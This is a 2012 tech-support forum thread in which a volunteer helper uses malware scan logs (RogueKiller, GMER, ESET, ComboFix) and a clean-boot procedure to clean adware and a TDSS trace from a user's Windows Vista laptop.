Blog: http://tigzyrk.blogspot.com

Operating System: Windows Vista (6.0.6002 Service Pack 2) 32 bits version
Started in : Normal mode
User: GAGAN [Admin rights]
Mode: Scan -- Date: 06/02/2012 00:26:43

¤¤¤ Bad processes: 0 ¤¤¤

¤¤¤ Registry Entries: 5 ¤¤¤
[HJ] HKCU\[...]\Advanced : Start_ShowPrinters (0) -> FOUND
[HJ] HKLM\[...]\NewStartPanel : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -> FOUND
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> FOUND
[HJ] HKCU\[...]\ClassicStartMenu : {645FF040-5081-101B-9F08-00AA002F954E} (1) -> FOUND
[HJ] HKCU\[...]\NewStartPanel : {645FF040-5081-101B-9F08-00AA002F954E} (1) -> FOUND

¤¤¤ Particular Files / Folders: ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

¤¤¤ Infection : ¤¤¤

¤¤¤ HOSTS File: ¤¤¤
127.0.0.1 localhost

¤¤¤ MBR Check: ¤¤¤

+++++ PhysicalDrive0: FUJITSU MHX2250BT ATA Device +++++
--- User ---
[MBR] 5fda213a8146ffd7df142aa50ce8c7a4
[BSP] 2c60e3e08a4fa002faabe1a5a0bd19e2 : Windows Vista MBR Code
Partition table:
0 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 2048 | Size: 1500 Mo
1 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 3074048 | Size: 236974 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Finished : << RKreport[1].txt >>
RKreport[1].txt

I'm not sure about the virus u mentioned. I have had a few serious infections which was solved with malware bytes mostly in safe mode. I have more than one person using this computer and have been infected fake antivirus virus more than once


----------



## gagraptor (May 23, 2012)

GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2012-06-02 00:49:08
Windows 6.0.6002 Service Pack 2 
Running: 1ciu4pjc.exe; Driver: C:\Users\GAGAN\AppData\Local\Temp\pwtoqpow.sys

---- System - GMER 1.0.15 ----

INT 0x52 ? 865B1BF8
INT 0x52 ? 865B1BF8
INT 0x72 ? 865B1BF8
INT 0x92 ? 8553CBF8
INT 0xA2 ? 8553CBF8
INT 0xB1 ? 84BACBF8
INT 0xB1 ? 84BACBF8
INT 0xB2 ? 8553CBF8
INT 0xB2 ? 8553CBF8
INT 0xB2 ? 8553CBF8
INT 0xB3 ? 865B1BF8

---- Registry - GMER 1.0.15 ----

Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 771343423
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 285507792
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\[email protected] 2
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0xAD 0x66 0x47 0x5B ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] C:\Program Files\Alcohol Soft\Alcohol 52\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0xBB 0x65 0xF9 0xC7 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg40 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected]  0x6E 0x90 0x05 0x13 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg41 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0xC2 0x5F 0x4E 0x41 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\[email protected] 0xA8 0x7C 0x8B 0xB0 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0xC2 0xF8 0x53 0x51 ...
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\0Jf40 
Reg HKLM\SYSTEM\CurrentControlSet\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\[email protected] 0x5D 0x8B 0xF9 0xA4 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0xAD 0x66 0x47 0x5B ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] C:\Program Files\Alcohol Soft\Alcohol 52\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0xBB 0x65 0xF9 0xC7 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg40 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0x6E 0x90 0x05 0x13 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\jdgg41 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\0D79C293C1ED61418462E24595C90D04\00000001\[email protected] 0xC2 0x5F 0x4E 0x41 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected]0 C:\Program Files\DAEMON Tools Lite\
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 1
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\[email protected] 0xA8 0x7C 0x8B 0xB0 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0x20 0x01 0x00 0x00 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\[email protected] 0xC2 0xF8 0x53 0x51 ...
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\0Jf40 (not active ControlSet) 
Reg HKLM\SYSTEM\ControlSet002\Services\sptd\Cfg\19659239224E364682FA4BAF72C53EA4\00000001\[email protected] 0x5D 0x8B 0xF9 0xA4 ...
Reg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\9040820900063D11C8EF00054038389C\[email protected] 1086484348
Reg HKLM\SOFTWARE\Classes\[email protected] text
Reg HKLM\SOFTWARE\Classes\[email protected] htafile
Reg HKLM\SOFTWARE\Classes\[email protected] Type application/hta
Reg HKLM\SOFTWARE\Classes\.hta\PersistentHandler 
Reg HKLM\SOFTWARE\Classes\.hta\[email protected] {eec97550-47a9-11cf-b952-00aa0051fe20}
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] C:\Windows\system32\javaws.exe -uninstall -prompt "http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp"
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] jlGui 3.0
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] C:\Users\GAGAN\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\573addb9-2492e35c.ico
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] 1
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] 1
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] Music Player for the Java(tm) Platform
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ...
Reg HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui [email protected] http://www.javazoom.net

---- EOF - GMER 1.0.15 ----


----------



## Mark1956 (May 7, 2011)

> I'm sorry i was not very clear about the popup. It starts as soon i turn on the computer and is above all windows even if i've not opened any browser, If i'm not connected to the internet it still pops up but does not become the active window.


Not a problem .



> I'm not sure about the virus u mentioned. I have had a few serious infections which was solved with malware bytes mostly in safe mode. I have more than one person using this computer and have been infected fake antivirus virus more than once


That would explain the Malware trace found by TDSSKiller:
*00:54:15.0277 4376 \Device\Harddisk0\DR0 ( TDSS File System ) - warning*

After this is cleared up I shall give some closing advice to help keep you better protected.

Please now follow this guide, I have only just created this so hope you can follow it, any hitches then please let me know.

Selective Startup (Clean Boot)

I would recommend you print out these instructions and follow them slowly, one line at a time, as it is very easy to get confused with this. Unfortunately this is probably the only way we can find what is causing your problem.

Click on *Start*







then type *msconfig* into the *Search* box and hit the* Enter* key.
This screen should appear with the settings as shown:










Click on the Services tab and you should see this, click on the box next to *Hide all Microsoft Services* so a check mark appears.










Now click on the General tab and check the boxes as shown:










When done click on *Apply* and then *OK*.
The window will close and you will see a notification with two choices, click on *Restart*.
*After reboot check to see if the problem still exists, if it does then post back and wait for further guidance, if it appears to have been cured then please continue with these instructions.*
Open *msconfig* again in the same way as before. Under the *General* tab click the box next to *Load System Services* so it appears checked, click on *Apply* then *OK* and as before select *Restart* when the options appear.
Check again to see if the problem has returned. If *it has* then we are looking for a bad *Service*, if the problem *has not* returned we are looking for a bad *Startup* item.
Now open *msconfig* again, leave the check mark for *Selective Startup* and check both the boxes for *Load System Services* and* Load Startup Items*, these settings can now be left untouched until the end of the process.

If it was found that we are looking for a bad *Service* click on the *Services* tab. Or, if we are looking for a *Startup* item click on the *Startup* tab.
Now you have the list in view and we know that the item responsible for the problem is one of them. You can go the long, but less confusing, route of disabling one at a time, clicking on *Apply*, *OK* and *Restart* and checking again, but that could take a long time.
The quickest method is to disable (by unchecking the item/s) half at a time and then repeating the process and disabling half of the remaing items until the problem stops.
Once the problem has gone you will know that it is being caused by one of the items you have just disabled. You then need to go back and re-enable (by putting the check mark back next to the item) half of them. It is easy to make mistakes when doing this so keeping notes will help. Alternatively you can just disable items in goups of 6 at a time, the method you use is up to you, once you get the hang of it you should soon find the item that has caused all this time consuming work.
Once you have isolated the item then post back with the details.
If you move the mouse pointer over the top bar that has the column names in, it will change appearence as it goes over the divider, click and hold, then drag so you can expand the column width and get the full details that are listed. I will need the full information from all the columns.


----------



## gagraptor (May 23, 2012)

OK i'm not sure what happened. I followed your instruction to the T. after i enabled all services and startup items the popup is gone and i ran malware bytes and it does not find any infections. I had disabled some start up items a few months ago as they were from sources i did not recognize. I enabled them too. I'm not sure what happened???


----------



## gagraptor (May 23, 2012)

PS my Physical memory usage is always above 50%


----------



## Mark1956 (May 7, 2011)

Ok, a clean scan result with Malwarebytes is a good sign, but high memory usage is a worry and needs to be looked at. When you open Task Manager can you see what process is using the memory. You need to check this with no browser or any software running.

I think we should now do an online scan.

*Eset online scan instructions.*
*IMPORTANT --->* Please make sure you follow the instruction to *uncheck* the box next to *Remove found threats*. Eset will detect anything that looks even remotely suspicious, this can include legitimate program files. If you do not uncheck the box, as instructed, Eset will automatically remove all suspect files which could leave some of your software inoperative. If you make a mistake these files can be restored from quarantine, but it would be preferable not to add any extra work to the clean up of your system.

Disable your existing Anti Virus following these instructions.
Please go here to use the Eset Online Scanner.
When the web page opens click on this button








If you are not using *Internet Explorer* you will see a message box open asking you to to download the *ESET Smart Installer*, click on the link and allow it to download and then run it. Accept the *Terms of use* and click on *Start*. The required components will download.
If using Internet Explorer the *Terms of use* box will open immediately, accept it and click on *Start*.
After the download is complete the *Computer scan settings* window will open, *IMPORTANT ---->* *uncheck* the box next to *Remove found threats* and click on *Start*. The virus signature database will then download which may take some time depending on the speed of your internet connection. The scan will automatically start when the download is complete.
This is a very thorough scan and may take several hours to complete depending on how much data you have on your hard drive. *Do not* interrupt it, be patient and let it finish.
A Scan Results window will appear at the end of the scan. If it lists any number of Infected Files click on List of found threats. Click on Copy to clipboard, come back to this thread and right click on the message box. Select *Paste* and the report will appear, add any comments you have and post the reply.
Back on the *Eset* window, click the *Back* button and then click on *Finish*.


----------



## gagraptor (May 23, 2012)

C:\Program Files\Veoh Networks\VeohWebPlayer\qlipso-qlipso-silent-us.exe	a variant of Win32/Toolbar.Zugo application
C:\Users\GAGAN\Downloads\VeohWebPlayerSetup_eng.exe	a variant of Win32/Toolbar.Zugo application


----------



## Mark1956 (May 7, 2011)

Looks like your system is clean. The two detections are from legitimate software on your system.

You didn't answer this:


> When you open Task Manager can you see what process is using the memory. You need to check this with no browser or any software running.


How much physical memory does your PC have?
Click on Start > Control Panel > System, and tell me what it shows as Installed memory.
___________________________________________________________________________

Please run TDSSKiller again, when the scan results show up mark this for Deletion:

*\Device\Harddisk0\DR0 ( TDSS File System )*

Please post the log for me to check.

___________________________________________________________________________

This is just to clear out a couple of orphan entries left behind.

We are now going to run ComboFix a different way.
Open Notepad by clicking on







and in the *Search* box type: *Notepad.exe* and hit *Enter*.
Copy and paste everything in the *code box* below into it.
_-- Note: Make sure Word Wrap is *unchecked* in Notepad by clicking on *Format* in the top menu._

```
KillAll::
DDS::
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
uRun: [<NO NAME>] 
mURLSearchHooks: H - No File
ClearJavaCache::
Reboot::
```

Save the file as *CFScript.txt* by choosing _Save As..._ in the File Menu, and save it to your Desktop where the ComboFix icon is also located.
Close your browser and* disconnect* from the Internet.
Now use your mouse to *drag*, then *drop* the CFScript.txt file on top of ComboFix.exe as seen in the image below.








This will start ComboFix again and launch the script.
ComboFix may reboot your system when it finishes. This is normal.
A log will be created just as before and saved to C:\ComboFix.txt. Please copy and paste the contents of *ComboFix.txt* in your next reply.
Be sure to *re-enable* your anti-virus and other security programs *after* the scan is complete.
__________________________________________________________________________

Download Security Check by screen317 from Here or Here.
Save it to your Desktop.
Double click SecurityCheck.exe (Vista or Windows 7 users right click and select "Run as Administrator") and follow the onscreen instructions inside of the black box. Press any key when asked.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

_________________________________________________________________________

Go Here, scroll down the page to the blue arrow where it says *"Download our FREE WinPatrol here"* and click on it to download. Install the program.
Launch the program and click on the *"Start up Programs"* tab.

Disable everything apart from your security software and see if that helps with the memory usage.

You can also use Winpatrol to disable the Windows Search indexer under the Services tab or follow this guide:
If you rarely use the search function to find files on your system then shutting down the Windows Search indexer can save on system resources. Please follow this guide: Windows Search Indexing in Vista/Windows 7

_________________________________________________________________________

After this we just have some cleaning up to do of all the tools used.


----------



## gagraptor (May 23, 2012)

ComboFix 12-06-08.02 - GAGAN 06/09/2012 1:17.4.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1082 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-05-09 to 2012-06-09 )))))))))))))))))))))))))))))))
.
.
2012-06-09 05:36 . 2012-06-09 05:50	--------	d-----w-	c:\users\GAGAN\AppData\Local\temp
2012-06-09 05:36 . 2012-06-09 05:36	--------	d-----w-	c:\users\Default\AppData\Local\temp
2012-06-09 05:08 . 2012-06-09 05:08	29904	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\MpKsl1a49a7d1.sys
2012-06-09 05:08 . 2012-06-09 05:08	56200	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\offreg.dll
2012-06-09 05:02 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{FEAD2235-D668-4335-86CF-32C221B7FC34}\mpengine.dll
2012-06-06 07:06 . 2012-06-06 07:06	--------	d-----w-	c:\program files\ESET
2012-06-03 06:04 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56 . 2012-04-02 13:36	2044928	----a-w-	c:\windows\system32\win32k.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Pando Media Booster"="c:\program files\Pando Networks\Media Booster\PMB.exe" [2009-02-27 2785608]
"googletalk"="c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe" [2007-01-01 3739648]
"Akamai NetSession Interface"="c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe" [2012-05-08 3331872]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"HWSetup"="\HWSetup.exe hwSetUP" [X]
"TPwrMain"="c:\program files\TOSHIBA\Power Saver\TPwrMain.EXE" [2007-03-29 411192]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"SmoothView"="c:\program files\Toshiba\SmoothView\SmoothView.exe" [2007-03-22 448632]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"NBAgent"="c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe" [2009-06-18 1062184]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"HSON"="c:\program files\TOSHIBA\TBS\HSON.exe" [2006-12-07 55416]
"dldtmon.exe"="c:\program files\Dell V305\dldtmon.exe" [2010-02-10 672424]
"dldtamon"="c:\program files\Dell V305\dldtamon.exe" [2010-02-10 16040]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SVPWUTIL"="c:\program files\TOSHIBA\Utilities\SVPWUTIL.exe" [2006-03-23 438272]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"KeNotify"="c:\program files\TOSHIBA\Utilities\KeNotify.exe" [2006-11-07 34352]
"Camera Assistant Software"="c:\program files\Camera Assistant Software for Toshiba\traybar.exe" [2007-04-10 413696]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE [N/A]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Metacafe.lnk - c:\program files\Metacafe\MetacafeAgent.exe [N/A]
Microsoft Office.lnk - c:\program files\Microsoft Office\Office10\OSA.EXE [2001-2-13 83360]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-06-09 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-06-01 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-06-06 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local;<local>
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-06-09 01:48
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
